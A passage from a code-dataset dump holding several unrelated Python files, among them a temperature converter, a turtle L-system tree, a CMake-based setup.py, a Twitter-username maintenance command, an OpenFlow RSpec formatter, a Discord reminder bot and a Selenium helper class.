clave.\")\r\n print(\"[0] - Salir\")\r\n\r\n\r\ndef elegirOpcion():\r\n opcion = 0\r\n while True:\r\n try:\r\n opcion = int(input(\"Opcion: \"))\r\n if opcion in [0, 1, 2]:\r\n break\r\n except ValueError:\r\n print('ERROR: Introduzca un numero')\r\n return opcion\r\n\r\n\r\ndef carga_keywords():\r\n claves = []\r\n with open('keywords.txt') as f:\r\n for linea in f:\r\n claves += linea.split()\r\n return claves\r\n\r\n\r\ndef muestraKeywords(claves):\r\n vuelta = 1\r\n for contador, clave in enumerate(claves):\r\n if contador < 20 * vuelta:\r\n print(clave)\r\n else:\r\n input('Mostrar mas...')\r\n print(clave)\r\n vuelta += 1\r\n\r\n\r\ndef flujo():\r\n while True:\r\n menu()\r\n opcion = elegirOpcion()\r\n\r\n if opcion == 0:\r\n break\r\n elif opcion == 1:\r\n keywords = carga_keywords()\r\n elif opcion == 2:\r\n muestraKeywords(keywords)\r\n\r\n\r\nif __name__ == '__main__':\r\n flujo()\r\n","repo_name":"aperonac/j2logo-ejericios","sub_path":"Ejercicio 1/Ejercicio1.py","file_name":"Ejercicio1.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24202202932","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[12]:\n\n\nimport datetime\nclass Temperature:\n \n temp=0;\n \n def __init__(self,temp):\n self.temp=temp;\n \n def ToFahrenheit(self):\n InFahrenheit = float((9 * self.temp) / 5 + 32)\n return InFahrenheit\n \n def ToCelcius(self):\n InCelcius = float((self.temp - 32) * 5 / 9)\n return InCelcius\n \nclass Time(Temperature):\n \n \n def time():\n cur_tim=datetime.datetime.now()\n return cur_tim\n \n \n pass\n\n \n \ninp_temp1 = float(input(\"\"\"Enter the input in Celcius:\"\"\"))\ntemp_fah=Temperature(inp_temp1)\nprint(temp_fah.ToFahrenheit())\n\ninp_temp2 = float(input(\"\"\"Enter the input in Fahrenheit\"\"\"))\ntemp_cel=Temperature(inp_temp2)\nprint(temp_cel.ToCelcius())\n\nx=Time(23)\nprint(x.ToFahrenheit())\n\n\ny=Time.time()\nprint(y)\n\n\n\n\n \n \n \n \n \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"akhileshgowda7/Python-2","sub_path":"FahToCel.py","file_name":"FahToCel.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73839674707","text":"#---- foo52ru ---------\r\n# генерация дерева без листьев\r\n# https://youtu.be/mAz46Z5curo\r\nimport turtle\r\nfrom random import randint\r\nturtle.hideturtle()\r\nturtle.tracer(0)\r\nturtle.penup()\r\nturtle.setposition(0,-300)\r\nturtle.left(90)\r\nturtle.pendown()\r\nthick = 16\r\nturtle.pensize(thick)\r\n\r\naxiom = \"22220\"\r\naxmTemp = \"\"\r\nitr = 11\r\nangl = 20\r\ndl = 10\r\nstc = []\r\n\r\ntranslate={\"1\":\"21\",\r\n \"0\":\"1[-20]+20\"}\r\n\r\nfor k in range(itr):\r\n for ch in axiom:\r\n if ch in translate:\r\n axmTemp+=translate[ch]\r\n else:\r\n axmTemp+=ch\r\n axiom = axmTemp\r\n axmTemp = \"\"\r\n\r\nfor ch in axiom:\r\n if ch == \"+\":\r\n turtle.right(angl - randint(-13,13))\r\n elif ch == \"-\":\r\n turtle.left(angl - randint(-13,13))\r\n elif ch == \"2\":\r\n if randint(0,10)>5:\r\n turtle.forward(dl) \r\n elif ch == \"1\":\r\n turtle.forward(dl)\r\n elif ch == \"0\":\r\n turtle.forward(dl) \r\n elif ch == \"[\":\r\n thick = thick*0.75\r\n turtle.pensize(thick)\r\n stc.append(thick)\r\n stc.append(turtle.xcor())\r\n stc.append(turtle.ycor())\r\n stc.append(turtle.heading())\r\n elif ch == \"]\":\r\n turtle.penup()\r\n turtle.setheading(stc.pop())\r\n turtle.sety(stc.pop())\r\n turtle.setx(stc.pop())\r\n thick = 
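
The conversions in the FahToCel record above implement F = 9C/5 + 32 and C = (F - 32) * 5/9. A standalone sanity check against the usual fixed points (the helper names here are illustrative, not from the record):

def c_to_f(c):
    return 9 * c / 5 + 32

def f_to_c(f):
    return (f - 32) * 5 / 9

assert c_to_f(100) == 212.0             # boiling point
assert f_to_c(32) == 0.0                # freezing point
assert f_to_c(c_to_f(-40)) == -40.0     # the two scales agree at -40
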
stc.pop()\r\n turtle.pensize(thick)\r\n turtle.pendown()\r\nturtle.update() \r\nturtle.mainloop()\r\n","repo_name":"foo52ru/L-systems-Trees","sub_path":"notLeafs.py","file_name":"notLeafs.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6824310582","text":"import os\nimport re\nimport subprocess\nimport sys\nfrom pathlib import Path\nfrom setuptools import find_packages\nfrom setuptools import Extension, setup\nfrom setuptools.command.build_ext import build_ext\n\n# Convert distutils Windows platform specifiers to CMake -A arguments\nPLAT_TO_CMAKE = {\n \"win32\": \"Win32\",\n \"win-amd64\": \"x64\",\n \"win-arm32\": \"ARM\",\n \"win-arm64\": \"ARM64\",\n}\n\n# A CMakeExtension needs a sourcedir instead of a file list.\n# The name must be the _single_ output extension from the CMake build.\n# If you need multiple extensions, see scikit-build.\nclass CMakeExtension(Extension):\n def __init__(self, name: str, sourcedir: str = \"\") -> None:\n super().__init__(name, sources=[])\n self.sourcedir = os.fspath(Path(sourcedir).resolve())\n\n\n\nclass CMakeBuild(build_ext):\n def build_extension(self, ext):\n extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n\n # required for auto-detection & inclusion of auxiliary \"native\" libs\n if not extdir.endswith(os.path.sep):\n extdir += os.path.sep\n\n debug = int(os.environ.get(\"DEBUG\", 0)) if self.debug is None else self.debug\n cfg = \"Debug\" if debug else \"Release\"\n\n # CMake lets you override the generator - we need to check this.\n # Can be set with Conda-Build, for example.\n cmake_generator = os.environ.get(\"CMAKE_GENERATOR\", \"\")\n\n # Set Python_EXECUTABLE instead if you use PYBIND11_FINDPYTHON\n # EXAMPLE_VERSION_INFO shows you how to pass a value into the C++ code\n # from Python.\n cmake_args = [\n f\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY={extdir}\",\n f\"-DPYTHON_EXECUTABLE={sys.executable}\",\n f\"-DCMAKE_BUILD_TYPE={cfg}\", # not used on MSVC, but no harm\n ]\n build_args = []\n # Adding CMake arguments set as environment variable\n # (needed e.g. to build for ARM OSx on conda-forge)\n if \"CMAKE_ARGS\" in os.environ:\n cmake_args += [item for item in os.environ[\"CMAKE_ARGS\"].split(\" \") if item]\n\n # In this example, we pass in the version to C++. You might not need to.\n cmake_args += [f\"-DEXAMPLE_VERSION_INFO={self.distribution.get_version()}\"]\n\n if self.compiler.compiler_type != \"msvc\":\n # Using Ninja-build since it a) is available as a wheel and b)\n # multithreads automatically. 
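
The translate table in the notLeafs record above is an L-system rule set: each rewriting pass expands every '0' and '1' and passes all other symbols through. A standalone sketch of a single rewrite step, with the semantics inferred from that record's loop:

rules = {"1": "21", "0": "1[-20]+20"}

def step(axiom):
    # rewrite each symbol via the table; '2', '[', ']', '+', '-' pass through unchanged
    return "".join(rules.get(ch, ch) for ch in axiom)

s = "22220"                        # the record's starting axiom
s = step(s)
assert s == "22221[-20]+20"        # only the trailing '0' was expanded
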
MSVC would require all variables be\n # exported for Ninja to pick it up, which is a little tricky to do.\n # Users can override the generator with CMAKE_GENERATOR in CMake\n # 3.15+.\n if not cmake_generator or cmake_generator == \"Ninja\":\n try:\n import ninja # noqa: F401\n\n ninja_executable_path = os.path.join(ninja.BIN_DIR, \"ninja\")\n cmake_args += [\n \"-GNinja\",\n f\"-DCMAKE_MAKE_PROGRAM:FILEPATH={ninja_executable_path}\",\n ]\n except ImportError:\n pass\n\n else:\n\n # Single config generators are handled \"normally\"\n single_config = any(x in cmake_generator for x in {\"NMake\", \"Ninja\"})\n\n # CMake allows an arch-in-generator style for backward compatibility\n contains_arch = any(x in cmake_generator for x in {\"ARM\", \"Win64\"})\n\n # Specify the arch if using MSVC generator, but only if it doesn't\n # contain a backward-compatibility arch spec already in the\n # generator name.\n if not single_config and not contains_arch:\n cmake_args += [\"-A\", PLAT_TO_CMAKE[self.plat_name]]\n\n # Multi-config generators have a different way to specify configs\n if not single_config:\n cmake_args += [\n f\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{cfg.upper()}={extdir}\"\n ]\n build_args += [\"--config\", cfg]\n\n if sys.platform.startswith(\"darwin\"):\n # Cross-compile support for macOS - respect ARCHFLAGS if set\n archs = re.findall(r\"-arch (\\S+)\", os.environ.get(\"ARCHFLAGS\", \"\"))\n if archs:\n cmake_args += [\"-DCMAKE_OSX_ARCHITECTURES={}\".format(\";\".join(archs))]\n\n # Set CMAKE_BUILD_PARALLEL_LEVEL to control the parallel build level\n # across all generators.\n if \"CMAKE_BUILD_PARALLEL_LEVEL\" not in os.environ:\n # self.parallel is a Python 3 only way to set parallel jobs by hand\n # using -j in the build_ext call, not supported by pip or PyPA-build.\n if hasattr(self, \"parallel\") and self.parallel:\n # CMake 3.12+ only.\n build_args += [f\"-j{self.parallel}\"]\n\n build_temp = os.path.join(self.build_temp, ext.name)\n if not os.path.exists(build_temp):\n os.makedirs(build_temp)\n\n subprocess.check_call([\"cmake\", ext.sourcedir] + cmake_args, cwd=build_temp)\n subprocess.check_call([\"cmake\", \"--build\", \".\"] + build_args, cwd=build_temp)\n\n\nsetup(\n name=\"pyElemSymPoly\",\n packages=find_packages(),\n version=\"0.1.14\",\n license=\"MIT\",\n #home_page=\"https://github.com/IshanHegde/ElemSymPoly\",\n install_requires=[\n \"numpy >= 1.19.2\"\n ],\n url= \"https://github.com/IshanHegde/ElemSymPoly\",\n description=\"Fast, arbitrary precision computation of Elementary Symmetric Polynomials.\",\n long_description = \"\"\"\n \n ElemSymPoly is a high-performance C library with Python bindings that utilizes the GNU MPFR Library for \n precise computation of Elementary Symmetric Polynomials and a custom FFT implimentation. \\n\n \n The Library is currently in development stage and not production ready. \\n\n \n The library is based on applying a divide and conquer approach to compute the elementary symmetric polynomials. \\n\n \n First, the elementary symmetric polynomials of order N is expressed as a product of N order 1 polynomials. \\n\n \n Next, using a divide and conquer approach, the product of N order 1 polynomials is computed by recursively. \\n\n \n After a certain arbitrary threshold (currently set to 8), the polynomials of order 8 or above are computed using FFT. \\n\n \n The FFT algorithm is a custom implementation of the classic recursive Cooley-Tukey FFT algorithm. 
\\n\n \n This algorithim has a time complexity of O( N log^2 N ) compared to the naive approach of O( N^2 ) and also has\n arbitrary precision support (currently up to 512 decimal places due to stack overflow concerns). \\n\n \n The library also has a Python wrapper for ease of use, and only relies on NumPy, GNU MPFR which in turn relies on\n GNU GMP, Python C headers, CMake, glibc and a C compiler (only tested with GCC). \\n\n \"\"\",\n ext_modules=[CMakeExtension('pyElemSymPoly')],\n cmdclass=dict(build_ext=CMakeBuild),\n zip_safe=False,\n python_requires=\">=3.8\",\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"Development Status :: 3 - Alpha\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: C\",\n \"Programming Language :: Python\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n \"Operating System :: POSIX\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Programming Language :: Python :: 3.12\",\n ]\n\n)\n","repo_name":"IshanHegde/ElemSymPoly","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6507549636","text":"from django.core.management.base import BaseCommand\nfrom django.db import transaction\nfrom people.models import Person\nfrom twitterbot.helpers import TwitterBot\n\nfrom ..twitter import TwitterAPIData\n\nVERBOSE = False\n\n\ndef verbose(*args, **kwargs):\n if VERBOSE:\n print(*args, **kwargs)\n\n\nclass Command(BaseCommand):\n help = (\n \"Use the Twitter API to check / fix Twitter screen names and user IDs\"\n )\n\n def handle_person(self, person):\n twitter_identifiers = person.get_identifiers_of_type(\"twitter_username\")\n\n # If they have any Twitter user IDs, then check to see if we\n # need to update the screen name from that; if so, update\n # the screen name. Skip to the next person. This catches\n # people who have changed their Twitter screen name, or\n # anyone who had a user ID set but not a screen name\n # (which should be rare). If the user ID is not a valid\n # Twitter user ID, it is deleted.\n\n # TODO can forloop be removed? As twitter_identifiers should only be 1\n # due to unique_together constraint on PersonIdentifier model?\n for identifier in twitter_identifiers:\n screen_name = identifier.value or None\n user_id = identifier.internal_identifier\n if user_id:\n verbose(\n \"{person} has a Twitter user ID: {user_id}\".format(\n person=person, user_id=user_id\n )\n )\n\n if user_id not in self.twitter_data.user_id_to_screen_name:\n # user ID not in our list our prefertched twitter_data but\n # before we delete them do a check to see if they were\n # suspended\n if self.twitterbot.is_user_suspended(\n screen_name=screen_name\n ):\n # log the suspension but keep the identifier and move on\n verbose(\n f\"{person}'s Twitter account ({user_id}) is currently suspended.\"\n )\n self.twitterbot.handle_suspended(identifier=identifier)\n continue\n\n # otherwise we know to remove them\n print(\n \"Removing user ID {user_id} for {person_name} as it is not a valid Twitter user ID. 
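
The long_description in the pyElemSymPoly record above outlines the algorithm: write the generating polynomial prod_i(1 + x_i*t) as N linear factors and multiply them divide-and-conquer style, switching to FFT for large products. A plain-float sketch of that idea (np.convolve stands in for the library's MPFR/FFT polynomial product; this is not the package's C implementation):

import numpy as np

def elem_sym_polys(xs):
    # Coefficients of prod_i (1 + x_i * t); coefficient k is e_k(xs).
    def prod(lo, hi):
        if hi - lo == 1:
            return np.array([1.0, xs[lo]])
        mid = (lo + hi) // 2
        return np.convolve(prod(lo, mid), prod(mid, hi))   # polynomial product
    return prod(0, len(xs))

e = elem_sym_polys([1.0, 2.0, 3.0])
assert np.allclose(e, [1.0, 6.0, 11.0, 6.0])   # e0=1, e1=6, e2=11, e3=6
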
{person_url}\".format(\n user_id=user_id,\n person_name=person.name,\n person_url=person.get_absolute_url(),\n )\n )\n self.twitterbot.save(\n person,\n msg=\"This Twitter user ID no longer exists; removing it \",\n )\n identifier.delete()\n continue\n\n correct_screen_name = self.twitter_data.user_id_to_screen_name[\n user_id\n ]\n if not screen_name or screen_name != correct_screen_name:\n msg = \"Correcting the screen name from {old_screen_name} to {correct_screen_name}\".format(\n old_screen_name=screen_name,\n correct_screen_name=correct_screen_name,\n )\n print(msg)\n identifier.value = correct_screen_name\n identifier.extra_data[\"status\"] = \"active\"\n identifier.save()\n self.twitterbot.save(person, msg)\n else:\n if identifier.extra_data.get(\"status\") != \"active\":\n identifier.extra_data[\"status\"] = \"active\"\n identifier.save()\n verbose(\n \"The screen name ({screen_name}) was already correct\".format(\n screen_name=screen_name\n )\n )\n\n # Otherwise, if they have a Twitter screen name (but no\n # user ID, since we already dealt with that case) then\n # find their Twitter user ID and set that as an identifier.\n # If the screen name is not a valid Twitter screen name, it\n # is deleted.\n elif screen_name:\n verbose(\n \"{person} has Twitter screen name ({screen_name}) but no user ID\".format(\n person=person, screen_name=screen_name\n )\n )\n\n if (\n screen_name.lower()\n not in self.twitter_data.screen_name_to_user_id\n ):\n # at this point we have a screen name stored but it is not\n # in the `twitter_data` with valid names and ID's so we do a\n # final check to see if the user is currently suspended\n # before removing\n if self.twitterbot.is_user_suspended(\n screen_name=screen_name\n ):\n # log the suspension and move on to the next one\n verbose(\n f\"{person}'s Twitter account ({screen_name}) is currently suspended.\"\n )\n self.twitterbot.handle_suspended(identifier=identifier)\n continue\n\n # otherwise we know the name is not valid so remove it\n print(\n \"Removing screen name {screen_name} for {person_name} as it is not a valid Twitter screen name. {person_url}\".format(\n screen_name=screen_name,\n person_name=person.name,\n person_url=person.get_absolute_url(),\n )\n )\n # TODO check should the object be deleted here?\n identifier.value = \"\"\n identifier.save()\n return\n\n print(\n \"Adding the user ID {user_id}\".format(\n user_id=self.twitter_data.screen_name_to_user_id[\n screen_name.lower()\n ]\n )\n )\n\n person.tmp_person_identifiers.update_or_create(\n person=person,\n value_type=\"twitter_username\",\n value=screen_name,\n defaults={\n \"internal_identifier\": self.twitter_data.screen_name_to_user_id[\n screen_name.lower()\n ],\n \"extra_data\": {\"status\": \"active\"},\n },\n )\n self.twitterbot.save(person)\n else:\n verbose(\n \"{person} had no Twitter account information\".format(\n person=person\n )\n )\n\n def handle(self, *args, **options):\n global VERBOSE\n VERBOSE = int(options[\"verbosity\"]) > 1\n self.twitterbot = TwitterBot()\n self.twitter_data = TwitterAPIData()\n self.twitter_data.update_from_api()\n # Now go through every person in the database and check their\n # Twitter details. This can take a long time, so use one\n # transaction per person.\n for person_id in Person.objects.order_by(\"name\").values_list(\n \"pk\", flat=True\n ):\n with transaction.atomic():\n # n.b. 
even though it's inefficient query-wise, we get\n # each person from the database based on their ID\n # within the transaction because the loop we're in\n # takes a long time, other otherwise we might end up\n # with out of date information (e.g. this has happened\n # with the person.versions field, with confusing\n # results...)\n person = Person.objects.get(pk=person_id)\n self.handle_person(person)\n","repo_name":"DemocracyClub/yournextrepresentative","sub_path":"ynr/apps/twitterbot/management/commands/twitterbot_update_usernames.py","file_name":"twitterbot_update_usernames.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"25217295805","text":"from rspecs.commons import DEFAULT_XMLNS, DEFAULT_XS, DEFAULT_SCHEMA_LOCATION,\\\n DSL_PREFIX\nfrom rspecs.commons_of import DEFAULT_OPENFLOW\nfrom rspecs.formatter_base import FormatterBase\nfrom lxml import etree\n\nDEFAULT_AD_SCHEMA_LOCATION = DEFAULT_SCHEMA_LOCATION\nDEFAULT_AD_SCHEMA_LOCATION += DSL_PREFIX + \"3/ad.xsd \"\nDEFAULT_AD_SCHEMA_LOCATION += DSL_PREFIX + \"ext/openflow/3/of-ad.xsd\"\n\n\nclass OFv3AdvertisementFormatter(FormatterBase):\n def __init__(self, xmlns=DEFAULT_XMLNS, xs=DEFAULT_XS,\n openflow=DEFAULT_OPENFLOW,\n schema_location=DEFAULT_AD_SCHEMA_LOCATION):\n super(OFv3AdvertisementFormatter, self).__init__(\n \"advertisement\", schema_location, {\"openflow\": \"%s\" % (openflow)},\n xmlns, xs)\n self.__of = openflow\n\n def add_datapath(self, rspec, dpath):\n d = etree.SubElement(rspec, \"{%s}datapath\" % (self.__of))\n d.attrib[\"component_id\"] = dpath.get(\"component_id\")\n d.attrib[\"component_manager_id\"] = dpath.get(\"component_manager_id\")\n d.attrib[\"dpid\"] = dpath.get(\"dpid\")\n\n for p in dpath.get('ports'):\n port = etree.SubElement(d, \"{%s}port\" % (self.__of))\n port.attrib[\"num\"] = p.get(\"num\")\n if p.get(\"name\") is not None:\n port.attrib[\"name\"] = p.get(\"name\")\n\n def datapath(self, dpath):\n self.add_datapath(self.rspec, dpath)\n\n def add_of_link(self, rspec, link):\n l = etree.SubElement(rspec, \"{%s}link\" % (self.__of))\n l.attrib[\"component_id\"] = link.get(\"component_id\")\n\n dpids_ = link.get(\"dpids\")\n ports_ = link.get(\"ports\")\n for i in range(len(dpids_)):\n dp = etree.SubElement(l, \"{%s}datapath\" % (self.__of))\n dp.attrib[\"component_id\"] = dpids_[i].get(\"component_id\")\n dp.attrib[\"component_manager_id\"] =\\\n dpids_[i].get(\"component_manager_id\")\n dp.attrib[\"dpid\"] = dpids_[i].get(\"dpid\")\n\n port = etree.SubElement(l, \"{%s}port\" % (self.__of))\n port.attrib[\"port_num\"] = ports_[i].get(\"port_num\")\n\n def of_link(self, link):\n self.add_of_link(self.rspec, link)\n\n def add_fed_link(self, rspec, link):\n l = etree.SubElement(rspec, \"{%s}link\" % (self.__of))\n l.attrib[\"component_id\"] = link.get(\"component_id\")\n\n ltype = etree.SubElement(l, \"{%s}link_type\" % (self.__of))\n ltype.attrib[\"name\"] = link.get(\"link_type_name\")\n\n cm = etree.SubElement(l, \"{%s}component_manager\" % (self.__of))\n cm.attrib[\"name\"] = link.get(\"component_manager_name\")\n\n for ifref in link.get(\"interface_ref_id\"):\n ref = etree.SubElement(l, \"{%s}interface_ref\" % (self.__of))\n ref.attrib[\"component_id\"] = ifref\n\n def fed_link(self, link):\n self.add_fed_link(self.rspec, 
link)\n","repo_name":"dana-i2cat/felix","sub_path":"modules/resource/utilities/rspecs/openflow/advertisement_formatter.py","file_name":"advertisement_formatter.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"24763476811","text":"import discord\nimport datetime\nfrom discord.ext import tasks\nimport sqlite3\nfrom sqlite3 import Error\nfrom datetime import datetime\nfrom os import getenv\n\nclient = discord.Client()\n\n\ndef create_database_connection(database_name):\n \"\"\" create a database connection to the SQLite database\n specified by db_file\n :param database_name: database file\n :return: Connection object or None\n \"\"\"\n conn = None\n try:\n conn = sqlite3.connect(database_name)\n except Error as e:\n print(e)\n return conn\n\n\ndef query_database_for_reminders(current_time):\n \"\"\"\n Query reminders by datetime\n :param current_time:\n :return:\n \"\"\"\n conn = create_database_connection('reminders.db')\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM reminders WHERE datetime=?\", (current_time,))\n result = cur.fetchone()\n cur.execute(\"DELETE FROM reminders WHERE datetime=?\", (current_time,))\n conn.commit()\n return result\n\n\n@tasks.loop(seconds=20)\nasync def check_for_reminders():\n now = datetime.utcnow()\n current_time = f'{now.year},{now.month},{now.day},{now.hour},{now.minute}'\n reminders = query_database_for_reminders(current_time)\n if reminders:\n embed = discord.Embed(title=\"Link to submit forecast\", url=\"https://www.wxchallenge.com/submit_forecast.php\",\n description=\"Don't forget to submit your forecast! You have 30 more minutes.\",\n color=0xff2600)\n embed.set_author(name=\"WxChallenge Reminder\", url=\"https://www.wxchallenge.com/submit_forecast.php\",\n icon_url=\"https://www.wxchallenge.com/img/wxc_logo.png\")\n channel = client.get_channel(841145714726010920)\n await channel.send(embed=embed)\n\n\n@client.event\nasync def on_ready():\n check_for_reminders.start()\n\n\nclient.run(getenv('DISCORD_TOKEN'))\n","repo_name":"arian-nasr/WxChallengeDiscordReminderBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18234927429","text":"#coding:utf-8\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.support.select import Select\r\nfrom selenium.common.exceptions import *\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom case.happy_public.wang_logging import Log\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\n\r\nlog = Log()\r\nsuccess = \"SUCCESS \"\r\nfail = \"FAIL \"\r\nscreen_file = \"D:\\\\test\\\\happyHiiso3\\\\file\\\\\"\r\n\r\ndef Browser(browser='ff', remoteAddress=None):\r\n t1 = time.time()\r\n dc = {'platform': 'ANY', 'browserName': 'chrome', 'version': '', 'javascriptEnabled': True}\r\n dr = None\r\n if remoteAddress is None:\r\n if browser == \"firefox\" or browser == \"ff\":\r\n dr = webdriver.Firefox()\r\n elif browser == \"chrome\" or browser == \"Chrome\":\r\n dr = webdriver.Chrome()\r\n elif browser == \"internet explorer\" or browser == \"ie\":\r\n dr = webdriver.Ie()\r\n elif browser == \"opera\":\r\n dr = webdriver.Opera()\r\n elif browser == \"phantomjs\":\r\n dr = webdriver.PhantomJS()\r\n elif 
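
The reminder lookup in the WxChallenge bot record above keys rows on an unpadded 'year,month,day,hour,minute' string, so writer and reader must build the key identically. A standalone round-trip with an in-memory SQLite database (the two-column table here is a simplification of the record's schema):

import sqlite3
from datetime import datetime

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE reminders (datetime TEXT, note TEXT)')

now = datetime(2024, 5, 7, 9, 3)
key = f'{now.year},{now.month},{now.day},{now.hour},{now.minute}'   # '2024,5,7,9,3', no zero padding
conn.execute('INSERT INTO reminders VALUES (?, ?)', (key, 'submit forecast'))

row = conn.execute('SELECT note FROM reminders WHERE datetime=?', (key,)).fetchone()
assert row == ('submit forecast',)
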
browser == \"edge\":\r\n dr = webdriver.Edge()\r\n else:\r\n if browser == \"RChrome\":\r\n dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n desired_capabilities=dc)\r\n elif browser == \"RIE\":\r\n dc['browserName'] = 'internet explorer'\r\n dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n desired_capabilities=dc)\r\n elif browser == \"RFirefox\":\r\n dc['browserName'] = 'firefox'\r\n dc['marionette'] = False\r\n dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n desired_capabilities=dc)\r\n try:\r\n driver = dr\r\n log.info(\"{0} Start a new browser: {1}, Spend {2} seconds\".format(success, browser, time.time() - t1))\r\n return driver\r\n except Exception:\r\n raise NameError(\"Not found {0} browser,You can enter 'ie','ff',\"\r\n \"'chrome','RChrome','RIe' or 'RFirefox'.\".format(browser))\r\n\r\n\r\nclass Wang(object):\r\n #基于原生的selenium 框架做了二次封装\r\n # def __init__(self, browser='ff', remoteAddress=None):\r\n # \"\"\"\r\n # remote consle:\r\n # dr = PySelenium('RChrome','127.0.0.1:8080')\r\n # \"\"\"\r\n # t1 = time.time()\r\n # dc = {'platform': 'ANY', 'browserName': 'chrome', 'version': '', 'javascriptEnabled': True}\r\n # dr = None\r\n # if remoteAddress is None:\r\n # if browser == \"firefox\" or browser == \"ff\":\r\n # dr = webdriver.Firefox()\r\n # elif browser == \"chrome\" or browser == \"Chrome\":\r\n # dr = webdriver.Chrome()\r\n # elif browser == \"internet explorer\" or browser == \"ie\":\r\n # dr = webdriver.Ie()\r\n # elif browser == \"opera\":\r\n # dr = webdriver.Opera()\r\n # elif browser == \"phantomjs\":\r\n # dr = webdriver.PhantomJS()\r\n # elif browser == \"edge\":\r\n # dr = webdriver.Edge()\r\n # else:\r\n # if browser == \"RChrome\":\r\n # dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n # desired_capabilities=dc)\r\n # elif browser == \"RIE\":\r\n # dc['browserName'] = 'internet explorer'\r\n # dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n # desired_capabilities=dc)\r\n # elif browser == \"RFirefox\":\r\n # dc['browserName'] = 'firefox'\r\n # dc['marionette'] = False\r\n # dr = webdriver.Remote(command_executor='http://' + remoteAddress + '/wd/hub',\r\n # desired_capabilities=dc)\r\n # try:\r\n # self.driver = dr\r\n # self.my_print(\"{0} Start a new browser: {1}, Spend {2} seconds\".format(success,browser,time.time()-t1))\r\n # except Exception:\r\n # raise NameError(\"Not found {0} browser,You can enter 'ie','ff',\"\r\n # \"'chrome','RChrome','RIe' or 'RFirefox'.\".format( browser))\r\n def __init__(self, driver):\r\n self.driver = driver\r\n\r\n def my_print(self,msg):\r\n log.info(msg)\r\n\r\n def open(self,url,t='',timeout=10):\r\n '''\r\n 使用get打开url后,最大化窗口,判断title是否符合预期\r\n Usage:\r\n driver = Wang()\r\n driver.open(url,t='')\r\n\r\n '''\r\n t1 = time.time()\r\n try:\r\n self.driver.get(url)\r\n self.driver.maximize_window()\r\n self.my_print(\"{0} Navigated to {1}, Spend {2} seconds\".format(success, url, time.time() - t1))\r\n except Exception:\r\n self.my_print(\"{0} Unable to load {1}, Spend {2} seconds\".format(fail, url, time.time() - t1))\r\n raise\r\n\r\n def max_window(self):\r\n '''\r\n Set browser window maximized.\r\n\r\n Usage:\r\n driver.max_window()\r\n '''\r\n t1 = time.time()\r\n self.driver.maximize_window()\r\n self.my_print(\"{0} Set browser window maximized, Spend {1} seconds\".format(success, time.time() - t1))\r\n\r\n def set_window(self, wide, high):\r\n '''\r\n Set 
browser window wide and high.\r\n\r\n        Usage:\r\n        driver.set_window(wide,high)\r\n        '''\r\n        t1 = time.time()\r\n        self.driver.set_window_size(wide, high)\r\n        self.my_print(\"{0} Set browser window wide: {1},high: {2}, Spend {3} seconds\".format(\r\n            success, wide, high, time.time() - t1))\r\n\r\n    def find_element(self, locator, timeout=10):\r\n        '''\r\n        Locate an element; the locator parameter is a tuple\r\n        Usage:\r\n        locator = (\"id\",\"xxx\")\r\n        driver.find_element(locator)\r\n\r\n        by_id = \"id\"\r\n        by_xpath = \"xpath\"\r\n        by_link_text = \"link text\"\r\n        by_partial_text = \"partial link text\"\r\n        by_name = \"name\"\r\n        by_tag_name = \"tag name\"\r\n        by_class_name = \"class name\"\r\n        by_css_selector = \"css selector\"\r\n\r\n        '''\r\n        try:\r\n            element = WebDriverWait(self.driver, timeout, 1).until(EC.presence_of_element_located(locator))\r\n            return element\r\n        except Exception:\r\n            nowTime = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n            self.driver.get_screenshot_as_file(screen_file + \"%s.jpg\" % nowTime)\r\n\r\n    def find_elements(self, locator, timeout=10):\r\n        # Locate a group of elements\r\n        try:\r\n            elements = WebDriverWait(self.driver, timeout, 1).until(EC.presence_of_all_elements_located(locator))\r\n            return elements\r\n        except Exception:\r\n            nowTime = time.strftime(\"%Y_%m_%d_%H_%M_%S\")\r\n            self.driver.get_screenshot_as_file(screen_file + \"%s.jpg\" % nowTime)\r\n\r\n    def send_keys(self, locator, text):\r\n        